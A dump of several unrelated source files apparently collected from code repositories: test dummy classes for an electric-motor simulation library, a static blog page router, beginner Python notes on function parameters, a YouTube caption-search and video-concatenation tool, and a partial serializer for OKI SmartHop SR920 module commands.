ndarray(float): An array containing the maximum allowed physical values for each state variable.
"""
return self._limits
@property
def nominal_state(self):
"""
Returns:
ndarray(float): An array containing the nominal values for each state variable.
"""
return self._nominal_values
def __init__(self, state_length=1, state_names='dummy_state', **kwargs):
super().__init__(
Box(-1, 1, shape=(1,)), Box(-1, 1, shape=(state_length,)),
[f'{state_names}_{i}' for i in range(state_length)], 1
)
self._limits = np.array([10 * (i + 1) for i in range(state_length)])
self._nominal_values = np.array([(i + 1) for i in range(state_length)])
self.action = None
self.state = None
self.closed = False
self.kwargs = kwargs
def reset(self, initial_state=None):
self.state = np.array([0] * len(self._state_names))
return self.state
def simulate(self, action):
self.action = action
self.state = np.array([action * (i + 1) for i in range(len(self._state_names))])
return self.state
def close(self):
self.closed = True
super().close()
class DummyVisualization(ElectricMotorVisualization):
def __init__(self, **kwargs):
self.closed = False
self.state = None
self.reference = None
self.reward = None
self.reference_trajectory = None
self.physical_system = None
self.reference_generator = None
self.reward_function = None
self.kwargs = kwargs
super().__init__()
def step(self, state, reference, reward, *_, **__):
self.state = state
self.reference = reference
self.reward = reward
def reset(self, reference_trajectories=None, *_, **__):
self.reference_trajectory = reference_trajectories
def set_modules(self, physical_system, reference_generator, reward_function):
self.physical_system = physical_system
self.reference_generator = reference_generator
self.reward_function = reward_function
class DummyVoltageSupply(VoltageSupply):
def __init__(self, u_nominal=560, tau=1e-4, **kwargs):
super().__init__(u_nominal, tau=tau)
self.i_sup = None
self.t = None
self.reset_counter = 0
self.args = None
self.kwargs = kwargs
self.get_voltage_counter = 0
def reset(self):
self.reset_counter += 1
return super().reset()
def get_voltage(self, i_sup, t, *args, **kwargs):
self.get_voltage_counter += 1
self.i_sup = i_sup
self.t = t
self.args = args
self.kwargs = kwargs
return [self._u_nominal]
class DummyConverter(PowerElectronicConverter):
voltages = Box(0, 1, shape=(1,))
currents = Box(-1, 1, shape=(1,))
action_space = Discrete(4)
def __init__(self, tau=2E-4, dead_time=False, interlocking_time=0, action_space=None, voltages=None, currents=None, **kwargs):
super().__init__(tau, dead_time, interlocking_time)
self.action_space = action_space or self.action_space
self.voltages = voltages or self.voltages
self.currents = currents or self.currents
self.reset_counter = 0
self.convert_counter = 0
self.switching_times = [tau]
self.action = None
self.action_set_time = None
self.i_out = None
self.last_i_out = None
self.t = None
self.kwargs = kwargs
self.u_in = None
def i_sup(self, i_out):
self.last_i_out = i_out
return i_out[0]
def set_switching_times(self, switching_times):
self.switching_times = switching_times
def set_action(self, action, t):
self.action_set_time = t
self.action = action
return [t + self._tau / 2, t + self._tau]
def reset(self):
self.reset_counter += 1
return [0.0] * self.voltages.shape[0]
def convert(self, i_out, t):
self.i_out = i_out
self.t = t
self.convert_counter += 1
self.u_in = [self.action] if type(self.action_space) is Discrete else self.action
return self.u_in
class DummyElectricMotor(ElectricMotor):
# defined test values
_default_motor_parameter = permex_motor_parameter['motor_parameter']
_default_limits = dict(omega=16, torque=26, u=15, i=26, i_0=26, i_1=21, u_0=15)
_default_nominal_values = dict(omega=14, torque=20, u=15, i=22, i_0=22, i_1=20)
HAS_JACOBIAN = True
electrical_jac_return = None
CURRENTS_IDX = [0, 1]
CURRENTS = ['i_0', 'i_1']
VOLTAGES = ['u_0']
def __init__(self, tau=1e-5, **kwargs):
self.kwargs = kwargs
self.reset_counter = 0
self.u_in = None
super().__init__(tau=tau, **kwargs)
def electrical_ode(self, state, u_in, omega, *_):
self.u_in = u_in
return state - u_in
def reset(self, state_space, state_positions):
self.reset_counter += 1
return super().reset(state_space, state_positions)
def torque(self, currents):
return np.prod(currents)
def i_in(self, state):
return [np.sum(state)]
def electrical_jacobian(self, state, u_in, omega, *_):
return self.electrical_jac_return
class PowerElectronicConverterWrapper(cv.PowerElectronicConverter):
def __init__(self, subconverter, **kwargs):
super().__init__(**kwargs)
self._converter = subconverter
self.action_space = self._converter.action_space
self.currents = self._converter.currents
self.voltages = self._converter.voltages
self.reset_calls = 0
self.set_action_calls = 0
self.last_action = None
self.last_t = None
self.last_i_out = None
self.last_u = None
self.last_i_sup = None
def reset(self):
self.reset_calls += 1
return self._converter.reset()
def set_action(self, action, t):
self.last_action = action
self.last_t = t
return self._converter.set_action(action, t)
def convert(self, i_out, t):
self.last_i_out = i_out
self.last_t = t
self.last_u = self._converter.convert(i_out, t)
return self.last_u
def i_sup(self, i_out):
self.last_i_out = i_out
self.last_i_sup = self._converter.i_sup(i_out)
return self.last_i_sup
class DummyScipyOdeSolver(ode):
"""
Dummy class for ScipyOdeSolver
"""
# defined test values
_kwargs = {'nsteps': 5}
_integrator = 'dop853'
_y = np.zeros(2)
_y_init = np.array([1, 6])
_t = 0
_tau = 1e-3
_t_init = 0.1
jac = None
# counter
_init_counter = 0
_set_integrator_counter = 0
_set_initial_value_counter = 0
_set_f_params_counter = 0
_set_jac_params_counter = 0
_integrate_counter = 0
def __init__(self, system_equation, jacobian_):
self._init_counter += 1
assert system_equation == system
assert jacobian_ == jacobian
super().__init__(system_equation, jacobian_)
def set_integrator(self, integrator, **args):
self._set_integrator_counter += 1
assert integrator == self._integrator
assert args == self._kwargs
return super().set_integrator(integrator, **args)
def set_initial_value(self, y, t=0.0):
self._set_initial_value_counter += 1
assert all(y == self._y_init)
assert t == self._t_init
def set_f_params(self, *args):
self._set_f_params_counter += 1
assert args == (2,)
super().set_f_params(2)
def set_jac_params(self, *args):
self._set_jac_params_counter += 1
assert args == (2,)
super().set_jac_params(*args)
def integrate(self, t, *_):
self._integrate_counter += 1
assert t == self._t_init + self._tau
return self._y_init * 2
class DummyLoad(MechanicalLoad):
"""
dummy class for mechanical load
"""
state_names = ['omega', 'position']
limits = dict(omega=15, position=10)
nominal_values = dict(omega=15, position=10)
mechanical_state = None
t = None
mechanical_ode_return = None
mechanical_jac_return = None
omega_range = None
HAS_JACOBIAN = True
def __init__(self, tau=1e-4, **kwargs):
self.kwargs = kwargs
self.reset_counter = 0
super().__init__(tau=tau, **kwargs)
def reset(self, state_space, state_positions, nominal_state, *_, **__):
self.reset_counter += 1
return np.zeros(2)
def mechanical_ode(self, t, mechanical_state, torque):
self.mechanical_state = mechanical_state
self.t = t
self.mechanical_ode_return = np.array([torque, -torque])
return self.mechanical_ode_return
def mechanical_jacobian(self, t, mechanical_state, torque):
self.mechanical_state = mechanical_state
self.t = t
self.mechanical_ode_return = np.array([torque, -torque])
return self.mechanical_jac_return
def get_state_space(self, omega_range):
self.omega_range = omega_range
return {'omega': 0, 'position': -1}, {'omega': 1, 'position': -1}
class DummyNoise(NoiseGenerator):
"""
dummy class for noise generator
"""
def __init__(self, **kwargs):
self.kwargs = kwargs
self.reset_counter = 0
super().__init__()
def reset(self):
return np.ones_like(self._state_variables, dtype=float) * 0.36
def noise(self, *_, **__):
return np.ones_like(self._state_variables, dtype=float) * 0.42
class DummyOdeSolver(OdeSolver):
"""
Dummy class for ode solver
"""
def __init__(self, **kwargs):
self.kwargs = kwargs
super().__init__()
def integrate(self, t):
self.last_y = self._y
self._y = self._y + t - self._t
self._t = t
return self._y
class DummyConstraint(Constraint):
def __init__(self, violation_degree=0.0):
super().__init__()
self.modules_set = False
self.violation_degree = violation_degree
def __call__(self, state):
return self.violation_degree
def set_modules(self, ps):
super().set_modules(ps)
self.modules_set = True
class DummyConstraintMonitor(ConstraintMonitor):
def __init__(self, no_of_dummy_constraints=1):
constraints = [DummyConstraint() for _ in range(no_of_dummy_constraints)]
super().__init__(additional_constraints=constraints)
class DummySCMLSystem(SCMLSystem):
"""
dummy class for SCMLSystem
"""
# defined test values
OMEGA_IDX = 0
TORQUE_IDX = 1
CURRENTS_IDX = []
VOLTAGES_IDX = []
U_SUP_IDX = -1
_limits = {}
_nominal_state = {}
_supply = None
_converter = None
_electrical_motor = None
_mechanical_load = None
_state_names = ['omega_me', 'torque', 'u', 'i', 'u_sup']
_state_length = 5
# counter
_set_limits_counter = 0
_set_nominal_state_counter = 0
def _set_limits(self):
self._set_limits_counter += 1
def _set_nominal_state(self):
self._set_nominal_state_counter += 1
def _build_state_space(self, state_names):
assert state_names == self._state_names
return None
def _build_state_names(self):
return self._state_names
def _set_indices(self):
pass
def simulate(self, action, *_, **__):
return np.ones(self._state_length) * 0.46
def _system_equation(self, t, state, u_in, **__):
return np.ones(self._state_length) * 0.87
def reset(self, *_):
return np.ones(self._state_length) * 0.12
def _forward_transform(self, quantities, motor_state):
return quantities
def _build_state(self, motor_state, torque, u_in, u_sup):
pass
def _action_transformation(self, action):
return action
class DummyRandom:
_expected_low = None
_expected_high = None
_expected_left = None
_expected_mode = None
_expected_right = None
_expected_values = None
_expected_probabilities = None
_expected_loc = None
_expected_scale = None
_expected_size = None
# counter
_monkey_random_rand_counter = 0
_monkey_random_triangular_counter = 0
_monkey_random_randint_counter = 0
_monkey_random_choice_counter = 0
_monkey_random_normal_counter = 0
def __init__(self, exp_low=None, exp_high=None, exp_left=None, exp_right=None, exp_mode=None, exp_values=None,
exp_probabilities=None, exp_loc=None, exp_scale=None, exp_size=None):
"""
set expected values
:param exp_low: expected lower value
:param exp_high: expected upper value
:param exp_mode: expected mode value
:param exp_right: expected right value
:param exp_left: expected left value
:param exp_values: expected values for choice
:param exp_probabilities: expected probabilities for choice
:param exp_loc: expected loc value
:param exp_scale: expected scale value
:param exp_size: expected size value
"""
self._expected_low = exp_low
self._expected_high = exp_high
self._expected_mode = exp_mode
self._expected_left = exp_left
self._expected_right = exp_right
self._expected_values = exp_values
self._expected_probabilities = exp_probabilities
self._expected_loc = exp_loc
self._expected_scale = exp_scale
self._expected_size = exp_size
    def monkey_random_rand(self):
        """mock function for np.random.rand()"""
        self._monkey_random_rand_counter += 1
        return 0.25
    def monkey_random_triangular(self, left, mode, right):
        """mock function for np.random.triangular()"""
        self._monkey_random_triangular_counter += 1
        if self._expected_left is not None:
            assert left == self._expected_left
        if self._expected_right is not None:
            assert right == self._expected_right
        if self._expected_mode is not None:
            assert mode == self._expected_mode
        return 0.45
    def monkey_random_randint(self, low, high):
        """mock function for random.randint()"""
        self._monkey_random_randint_counter += 1
        if self._expected_low is not None:
            assert low == self._expected_low
        if self._expected_high is not None:
            assert high == self._expected_high
        return 7
def monkey_random_choice(self, a, p):
self._monkey_random_choice_counter += 1
assert len(a) == len(p)
if self._expected_values is not None:
assert a == self._expected_values
if self._expected_probabilities is not None:
assert p == self._expected_probabilities
return a[0]
def monkey_random_normal(self, loc=0, scale=1.0, size=None):
if self._expected_loc is not None:
assert loc == self._expected_loc
if self._expected_scale is not None:
assert scale == self._expected_scale
if self._expected_size is not None:
assert size == self._expected_size
else:
size = 1
self._monkey_random_normal_counter += 1
result = np.array([0.1, -0.2, 0.6, 0.1, -0.5, -0.3, -1.7, 0.1, -0.2, 0.4])
return result[:size]
class DummyElectricMotorEnvironment(ElectricMotorEnvironment):
"""Dummy environment to test pre implemented callbacks. Extend for further testing cases"""
def __init__(self, reference_generator=None, callbacks=(), **kwargs):
reference_generator = reference_generator or DummyReferenceGenerator()
super().__init__(DummyPhysicalSystem(), reference_generator, DummyRewardFunction(), callbacks=callbacks)
def step(self):
self._call_callbacks('on_step_begin', 0, 0)
self._call_callbacks('on_step_end', 0, 0, 0, 0, 0)
def reset(self):
self._call_callbacks('on_reset_begin')
self._call_callbacks('on_reset_end', 0, 0)
    def close(self):
        self._call_callbacks('on_close')
class DummyCallback(Callback):
def __init__(self):
super().__init__()
self.reset_begin = 0
self.reset_end = 0
self.step_begin = 0
self.step_end = 0
self.close = 0
def on_reset_begin(self):
self.reset_begin += 1
def on_reset_end(self, *_):
self.reset_end += 1
def on_step_begin(self, *_):
self.step_begin += 1
def on_step_end(self, *_):
self.step_end += 1
def on_close(self):
self.close += 1
# endregion
``` |
{
"source": "54wedge/blog_builder",
"score": 2
} |
#### File: blog_builder/tool/router.py
```python
import tool.utils as utils
from tool.template import _Template
from tool.utils import config
from tool.utils import content_path
import tool.module as module
class _Router():
def __init__(self,post_list):
self.post_list = post_list
self.home = _Home(post_list)
self.archive = _Archive(post_list)
self.category_list = _Category(post_list).list()
self.tag_list = _Tag(post_list).list()
class _Home:
def __init__(self,post_list):
self.post_list = post_list[0:config['Site']['Home_Page_Items']]
self.path = utils.join_path(config['Directory']['Output'], 'index.html')
self.content = self.build()
def build(self):
list_home = module.home_module(self.post_list)
home_page = _Template('home')
home_page.replace('{$Page_Title$}', 'Home')
home_page.replace('{&Home_module&}',str(list_home))
home_page.replace('../','./')
return home_page.str()
class _Archive():
def __init__(self,post_list):
self.post_list = post_list
self.path = utils.join_path(config['Directory']['Output'], 'Archive/index.html')
self.content = self.build()
def build(self):
list_archive = module.archive_module(self.post_list)
archive_page = _Template('archive')
archive_page.replace('{$Page_Title$}', 'Archive')
archive_page.replace('{&Archive_module&}',str(list_archive))
return archive_page.str()
class _Category:
def __init__(self,post_list):
self.category_dict = {}
for post in post_list:
try:
self.category_dict[post.meta.category].append(post)
except KeyError:
self.category_dict[post.meta.category] = []
self.category_dict[post.meta.category].append(post)
def build(self, category_list, category_name):
list_category = module.post_module(category_list)
category_page = _Template('category')
category_page.replace('{$Page_Title$}', category_name)
category_page.replace('{$Category$}', category_name)
category_page.replace('{&Post_module&}',str(list_category))
category_page.replace('../','../../')
return category_page.str()
def list(self):
list = []
for category_name in self.category_dict.keys():
category_list = self.category_dict[category_name]
content = self.build(category_list, category_name)
path = utils.join_path(config['Directory']['Output'], 'category', category_name, 'index.html')
struct = content_path(content, path)
list.append(struct)
return list
class _Tag:
def __init__(self,post_list):
self.tag_dict = {}
for post in post_list:
for meta_tag in post.meta.tag:
try:
self.tag_dict[meta_tag].append(post)
except KeyError:
self.tag_dict[meta_tag] = []
self.tag_dict[meta_tag].append(post)
def build(self, tag_list, tag_name):
list_tag = module.post_module(tag_list)
tag_page = _Template('tag')
tag_page.replace('{$Page_Title$}', '#' + tag_name)
tag_page.replace('{$Tag$}', tag_name)
tag_page.replace('{&Post_module&}',str(list_tag))
tag_page.replace('../','../../')
return tag_page.str()
def list(self):
list = []
for tag_name in self.tag_dict.keys():
tag_list = self.tag_dict[tag_name]
content = self.build(tag_list, tag_name)
path = utils.join_path(config['Directory']['Output'], 'tag', tag_name, 'index.html')
struct = content_path(content, path)
list.append(struct)
return list
``` |
{
"source": "550872569/byte_of_python",
"score": 4
} |
#### File: python/def_param_fun/def_param_fun.py
```python
import math
def my_abs(x):
if not isinstance(x, (int, float)):
return None
if x >= 0:
return x
else:
return -x
# print(my_abs(-99))
# 99
# no result \ return function
def printInput(x):
print(x)
# print(printInput('10'))
# 10
# None
# print(my_abs('A'))
# None
def replaceNumber(a, b):
return b, a
# print(replaceNumber(12, 99))
# (99, 12)
# ax2+bx+c=
def sum(a, b, c):
if not isinstance(a, (int, float)):
return None
if not isinstance(b, (int, float)):
return None
if not isinstance(c, (int, float)):
return None
return a+b+c
# print(sum(12, 23, 34))
# 69
def power(x, n):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
# print(power(5, 2))
# 25
def powerDefault(x, n = 2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
# print(powerDefault(5))
# 25
'''
Notes on default parameters:
First, required parameters must come before default parameters,
otherwise the Python interpreter raises an error
(think about why a default parameter cannot precede a required one).
Second, think about how to choose default parameters:
when a function has several parameters, put the frequently varied ones first
and the rarely varied ones last; the rarely varied ones can become defaults.
The biggest benefit of default parameters is that they lower the difficulty of calling a function.
One rule to remember when defining default parameters: a default parameter must point to an immutable object!
A small illustration follows below.
'''
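# A small illustration of these rules (names invented for the example):
# required parameters first, then defaults, with the frequently varied
# default (age) placed before the rarely varied one (city).
def enroll(name, gender, age=6, city='Beijing'):
    return name, gender, age, city
# print(enroll('Sarah', 'F'))                 # ('Sarah', 'F', 6, 'Beijing')
# print(enroll('Adam', 'M', city='Tianjin'))  # override a default by keyword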
def add_end(L=[]):
L.append('END')
return L
# print(add_end())
# print(add_end())
# ['END']
# ['END', 'END']
# def addToEnd(L=None):
# if L is None:
# L = []
# L.append('END')
# return L
#
# print(addToEnd())
# print(addToEnd())
# ['END']
# ['END']
# To define this function, we first have to decide on its input parameters.
# Since the number of arguments is not fixed, the first idea is to pass a, b, c, ...
# in as a list or tuple, so the function can be defined as follows.
# A variadic parameter differs from a list/tuple parameter only by the * in front of it.
# Inside the function, the parameter numbers receives a tuple, so the body stays unchanged,
# but the caller may then pass any number of arguments, including zero
# (see the sketch after calc below).
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc([1, 2, 3, 5]))
'''
Python的函数具有非常灵活的参数形态,既可以实现简单的调用,又可以传入非常复杂的参数。
默认参数一定要用不可变对象,如果是可变对象,程序运行时会有逻辑错误!
要注意定义可变参数和关键字参数的语法:
*args是可变参数,args接收的是一个tuple;
**kw是关键字参数,kw接收的是一个dict。
以及调用函数时如何传入可变参数和关键字参数的语法:
可变参数既可以直接传入:func(1, 2, 3),又可以先组装list或tuple,再通过*args传入:func(*(1, 2, 3));
关键字参数既可以直接传入:func(a=1, b=2),又可以先组装dict,再通过**kw传入:func(**{'a': 1, 'b': 2})。
使用*args和**kw是Python的习惯写法,当然也可以用其他参数名,但最好使用习惯用法。
命名的关键字参数是为了限制调用者可以传入的参数名,同时可以提供默认值。
定义命名的关键字参数在没有可变参数的情况下不要忘了写分隔符*,否则定义的将是位置参数。
'''
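# A short illustrative sketch of the *args / **kw forms described above
# (the `person` function and its sample arguments are made up for demonstration):
def person(name, age, *args, city='Beijing', **kw):
    print(name, age, args, city, kw)
# person('Adam', 45, 'gym', city='Tianjin', job='Engineer')
# Adam 45 ('gym',) Tianjin {'job': 'Engineer'}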
```
#### File: python/Set/Set.py
```python
setDays = set()
print(setDays)
# set()
print(type(setDays))
# <class 'set'>
setDays.add('Monday')
print(setDays)
# {'Monday'}
setCopyDays = setDays.copy()
print(setCopyDays)
setCopyDays.add('Friday')
print(setDays)
# {'Monday'}
print(setCopyDays)
# {'Friday', 'Monday'}
print(setDays.difference(setCopyDays))
# set()
print(setCopyDays.difference(setDays))
# {'Friday'}
``` |
{
"source": "553269487/ConvLSTM-on-TIANCHI-CIKM-2017",
"score": 3
} |
#### File: 553269487/ConvLSTM-on-TIANCHI-CIKM-2017/model.py
```python
from torch import nn
import torch.nn.functional as F
import torch
class activation():
def __init__(self, act_type, negative_slope=0.2, inplace=True):
super().__init__()
self._act_type = act_type
self.negative_slope = negative_slope
self.inplace = inplace
def __call__(self, input):
if self._act_type == 'leaky':
return F.leaky_relu(input, negative_slope=self.negative_slope, inplace=self.inplace)
elif self._act_type == 'relu':
return F.relu(input, inplace=self.inplace)
elif self._act_type == 'sigmoid':
return torch.sigmoid(input)
else:
raise NotImplementedError
class ED(nn.Module):
def __init__(self, encoder, decoder):
super().__init__()
self.encoder = encoder
self.decoder = decoder
def forward(self, input):
        state = self.encoder(input)   # encode the input sequence into a hidden state
        output = self.decoder(state)  # decode the hidden state into the output sequence
return output
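
# Minimal usage sketch (hypothetical: `build_encoder()` / `build_decoder()`
# stand for user-provided nn.Module factories defined elsewhere):
#   model = ED(build_encoder(), build_decoder())
#   frames = torch.randn(4, 10, 1, 101, 101)  # (batch, seq, channels, H, W)
#   pred = model(frames)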
``` |
{
"source": "555holy/yt-concate",
"score": 2
} |
#### File: yt-concate/yt_concate/main.py
```python
import sys
import getopt
import logging
from distutils.util import strtobool
from yt_concate import log
from yt_concate.pipeline.steps.preflight import Preflight
from yt_concate.pipeline.steps.get_video_list import GetVideoList
from yt_concate.pipeline.steps.initialize_yt import InitializeYT
from yt_concate.pipeline.steps.download_captions import DownloadCaptions
from yt_concate.pipeline.steps.read_caption import ReadCaption
from yt_concate.pipeline.steps.search import Search
from yt_concate.pipeline.steps.download_videos import DownloadVideos
from yt_concate.pipeline.steps.edit_video import EditVideo
from yt_concate.pipeline.steps.postflight import Postflight
from yt_concate.pipeline.pipeline import Pipeline
from yt_concate.utils import Utils
CHANNEL_ID = 'UCKSVUHI9rbbkXhvAXK-2uxA'
def print_usage():
print('python yt-concate.py OPTIONS')
print('OPTIONS:')
print('{:>6} {:>12}{}'.format('-c', '--channel_id', 'Channel id for YouTube to download videos'))
print('{:>6} {:>12}{}'.format('-s', '--search_word', 'Search the selected word in the video lists'))
print('{:>6} {:>12}{}'.format('-l', '--limit', 'Set the limit of the videos about to download'))
    print('{:>6} {:>12}{}'.format('-o', '--output_file_replacement', 'Ask before replacing an existing output file'))
print('{:>6} {:>12}{}'.format('-f', '--fast', 'Ignore captions and video files already existed'))
print('{:>6} {:>12}{}'.format('', '--clean_up', 'Delete all the files produced by this project'))
print('{:>6} {:>12}{}'.format('', '--logging_level', 'Set a logging level for logger writing in yt_concate.log'))
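
# Example invocation (hypothetical values):
#   python main.py -c UCKSVUHI9rbbkXhvAXK-2uxA -s "hello" -l 10 -f True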
def main(argv):
steps = [
Preflight(),
GetVideoList(),
InitializeYT(),
DownloadCaptions(),
ReadCaption(),
Search(),
DownloadVideos(),
EditVideo(),
Postflight(),
]
inputs = {
'channel_id': 'UCKSVUHI9rbbkXhvAXK-2uxA',
'search_word': '<PASSWORD>',
'limit': 20,
'output_file_replacement': True,
'fast': True,
'clean_up': False,
'logging_level': logging.DEBUG,
}
short_opts = "hc:s:l:o:f:"
long_opts = "channel_id= search_word= limit= output_file_replacement= fast= clean_up= logging_level= ".split()
try:
opts, args = getopt.getopt(argv, short_opts, long_opts)
    except getopt.GetoptError:
        print_usage()
        sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('python main -c <channel_id> -s <search_word> -l<limit>')
sys.exit(0)
elif opt in ("-c", "--channel_id"):
inputs['channel_id'] = arg
elif opt in ("-s", "--search_word"):
inputs['search_word'] = arg
elif opt in ("-l", "--limit"):
inputs['limit'] = bool(strtobool(arg))
elif opt in ("-o", "--output_file_replacement"):
inputs['output_file_replacement'] = bool(strtobool(arg))
elif opt in ("-f", "--fast"):
inputs['fast'] = bool(strtobool(arg))
elif opt in "--clean_up":
inputs['clean_up'] = bool(strtobool(arg))
elif opt in "--logging_level":
            inputs['logging_level'] = getattr(log, arg)
log.config_logger(inputs['logging_level'])
utils = Utils()
p = Pipeline(steps)
p.run(inputs, utils)
if __name__ == '__main__':
main(sys.argv[1:])
```
#### File: pipeline/steps/download_captions.py
```python
import time
import concurrent.futures
import logging
from pytube import YouTube
from yt_concate.pipeline.steps.step import Step
class DownloadCaptions(Step):
def process(self, data, inputs, utils):
logger = logging.getLogger('yt_concate.log.' + __name__)
start = time.time()
with concurrent.futures.ThreadPoolExecutor(max_workers=15) as executor:
for yt in data:
if inputs['fast']:
if utils.caption_file_exists(yt):
logger.info(f'found downloaded caption files: {yt.id}')
continue
executor.submit(self.download_captions, yt)
end = time.time()
logger.info(f'took {end - start} seconds')
return data
def download_captions(self, yt):
logger = logging.getLogger('yt_concate.log.' + __name__)
try:
source = YouTube(yt.url)
caption = source.captions.get_by_language_code('a.en')
en_caption_convert_to_srt = caption.generate_srt_captions()
text_file = open(yt.caption_filepath, "w", encoding='utf-8')
text_file.write(en_caption_convert_to_srt)
text_file.close()
logger.info(f'successfully downloaded captions for : {yt.url}')
except (KeyError, AttributeError):
            logger.info(f'an error occurred while downloading captions for: {yt.url}')
```
#### File: pipeline/steps/initialize_yt.py
```python
from .step import Step
from yt_concate.model.yt import YT
class InitializeYT(Step):
def process(self, data, inputs, utils):
        return [YT(url) for url in data]
```
#### File: yt-concate/yt_concate/utils.py
```python
import os
import shutil
import sys
import logging
from yt_concate.settings import DOWNLOADS_DIR
from yt_concate.settings import VIDEOS_DIR
from yt_concate.settings import CAPTIONS_DIR
from yt_concate.settings import OUTPUTS_DIR
class Utils:
def __init__(self):
pass
def create_dirs(self):
os.makedirs(DOWNLOADS_DIR, exist_ok=True)
os.makedirs(VIDEOS_DIR, exist_ok=True)
os.makedirs(CAPTIONS_DIR, exist_ok=True)
os.makedirs(OUTPUTS_DIR, exist_ok=True)
def get_video_list_filepath(self, channel_id):
return os.path.join(DOWNLOADS_DIR, channel_id + '.txt')
def video_list_file_exists(self, channel_id):
filepath = self.get_video_list_filepath(channel_id)
return os.path.exists(filepath) and os.path.getsize(filepath) > 0
def caption_file_exists(self, yt):
filepath = yt.caption_filepath
return os.path.exists(filepath) and os.path.getsize(filepath) > 0
def video_file_exists(self, yt):
filepath = yt.video_filepath
return os.path.exists(filepath) and os.path.getsize(filepath) > 0
def get_output_filepath(self, channel_id, search_word):
filename = f'{channel_id}_{search_word}.mp4'
return os.path.join(OUTPUTS_DIR, filename)
def output_file_exists(self, channel_id, search_word):
filepath = self.get_output_filepath(channel_id, search_word)
return os.path.exists(filepath) and os.path.getsize(filepath) > 0
    def output_file_replacement_check(self, channel_id, search_word):
        logger = logging.getLogger('yt_concate.log.' + __name__)
        if self.output_file_exists(channel_id, search_word):
            answer = input('output file already exists, proceed anyway? (Y/N) ')
            if answer in ('Y', 'y'):
                logger.info('processing')
            elif answer in ('N', 'n'):
                logger.info('stop running')
                sys.exit(0)
    def delete_downloaded_files(self, channel_id):
        # remove the video list file first: it lives inside DOWNLOADS_DIR,
        # so deleting the directory first would make os.remove() fail
        os.remove(self.get_video_list_filepath(channel_id))
        shutil.rmtree(DOWNLOADS_DIR)
        shutil.rmtree(OUTPUTS_DIR)
``` |
{
"source": "556adarah/smarthop",
"score": 3
} |
#### File: smarthop/sr920/command.py
```python
import enum
import json
import logging
import pkgutil
from smarthop import sr920
_logger = logging.getLogger(__name__)
_templates = json.loads(pkgutil.get_data("smarthop", "sr920/commands.json"))
class SR920Command:
"""Represents the OKI SmartHop SR module API command.
Args:
command_id: A value of the SR920CommandId enum.
parameters: A dict object representing the API command parameters.
"""
def __init__(self, command_id, parameters=None):
_logger.debug(
"enter __init__(): command_id=%s, parameters=%s", command_id, parameters
)
self._command_id = command_id
self._parameters = parameters if parameters else {}
self._template = None
@property
def command_id(self):
"""Gets an identifier of the API command."""
return self._command_id
@property
def parameters(self):
"""Gets a dict object representing the API command parameters."""
return self._parameters
def to_bytes(self):
"""Converts to a bytes object representing the API command.
Returns:
A bytes object representing the API command.
"""
_logger.debug("enter to_bytes()")
command = bytearray(self.command_id.value.to_bytes(2, "big"))
if not self._template:
self._template = SR920Command._get_template(self.command_id)
if self._template and "parameters" in self._template:
command.extend(
SR920Command._pack_parameters(
self.parameters, self._template["parameters"]
)
)
return command
@classmethod
def parse(cls, data):
"""Converts the specified bytes object to an instance of the SR920Command class.
Args:
data: a bytes object to parse.
Returns:
An instance of the SR920Command class.
"""
_logger.debug("enter parse(): data=%s", data)
command_id = sr920.SR920CommandId(int.from_bytes(data[:2], byteorder="big"))
parameters = {}
payload = data[2:] if len(data) > 2 else None
template = cls._get_template(command_id)
if template and "parameters" in template:
cls._unpack_parameters(parameters, payload, template["parameters"])
return cls(command_id, parameters)
@staticmethod
def _get_template(command_id):
_logger.debug("enter _get_template(): command_id=%s", command_id)
for template in _templates["commands"]:
if template["name"] == command_id.name:
return template
_logger.warning("command template not found: command_id=%s", command_id)
return None
@classmethod
def _pack_parameters(cls, parameters, templates):
_logger.debug(
"enter _pack_parameters(): parameters=%s, templates=%s",
parameters,
templates,
)
data = bytearray()
for template in templates:
temp_type = template["type"]
if temp_type.startswith("select:"):
if temp_type[7:] not in parameters:
raise AttributeError(
"select variable not found: %s" % temp_type[7:]
)
param_case = parameters[temp_type[7:]]
# use name if select variable is an instance of Enum
if isinstance(param_case, enum.Enum):
param_case = param_case.name
default_case = None
for temp_case in template["cases"]:
if "default" in temp_case:
default_case = temp_case["default"]
elif param_case in temp_case["case"]:
data.extend(
cls._pack_parameters(parameters, temp_case["parameters"])
)
default_case = None
break
if default_case:
data.extend(cls._pack_parameters(parameters, default_case))
continue
if temp_type.startswith("ref:"):
if temp_type[4:] not in _templates["definitions"]:
raise AttributeError("reference not found: %s" % temp_type[4:])
reference = _templates["definitions"][temp_type[4:]]
data.extend(cls._pack_parameters(parameters, reference))
continue
if "value" in template:
param_value = template["value"]
else:
if template["name"] not in parameters:
raise AttributeError("parameter not found: %s" % template["name"])
param_value = parameters[template["name"]]
temp_len = template["length"] if "length" in template else 1
temp_endian = template["byteorder"] if "byteorder" in template else "big"
if temp_type == "bool":
if param_value:
if "true-value" in template:
param_value = int(template["true-value"], 16)
else:
if "false-value" in template:
param_value = int(template["false-value"], 16)
data.extend(param_value.to_bytes(temp_len, temp_endian))
elif temp_type == "int":
temp_signed = template["signed"] if "signed" in template else False
data.extend(
param_value.to_bytes(temp_len, temp_endian, signed=temp_signed)
)
elif temp_type == "str":
param_bytes = param_value.encode("ascii")
if temp_endian == "little":
param_bytes = param_bytes[::-1]
data.extend(param_bytes)
elif temp_type == "hex":
data.extend(int(param_value, 16).to_bytes(temp_len, temp_endian))
elif temp_type == "object":
data.extend(
SR920Command._pack_parameters(param_value, template["properties"])
)
elif temp_type == "array":
for item in param_value:
data.extend(
SR920Command._pack_parameters(
{template["items"]["name"]: item}, [template["items"]]
)
)
elif temp_type.startswith("enum:"):
data.extend(param_value.value.to_bytes(temp_len, temp_endian))
else: # bytes
data.extend(param_value)
return data
@classmethod
def _unpack_parameters(cls, parameters, data, templates):
_logger.debug(
"enter _unpack_parameters(): parameters=%s, data=%s, templates=%s",
parameters,
data,
templates,
)
for template in templates:
temp_type = template["type"]
if temp_type.startswith("select:"):
if temp_type[7:] not in parameters:
raise AttributeError(
"select variable not found: %s" % temp_type[7:]
)
param_case = parameters[temp_type[7:]]
# use name if select variable is an instance of Enum
if isinstance(param_case, enum.Enum):
param_case = param_case.name
default_case = None
for temp_case in template["cases"]:
if "default" in temp_case:
default_case = temp_case["default"]
elif param_case in temp_case["case"]:
(parameters, data) = cls._unpack_parameters(
parameters, data, temp_case["parameters"]
)
default_case = None
break
if default_case:
(parameters, data) = cls._unpack_parameters(
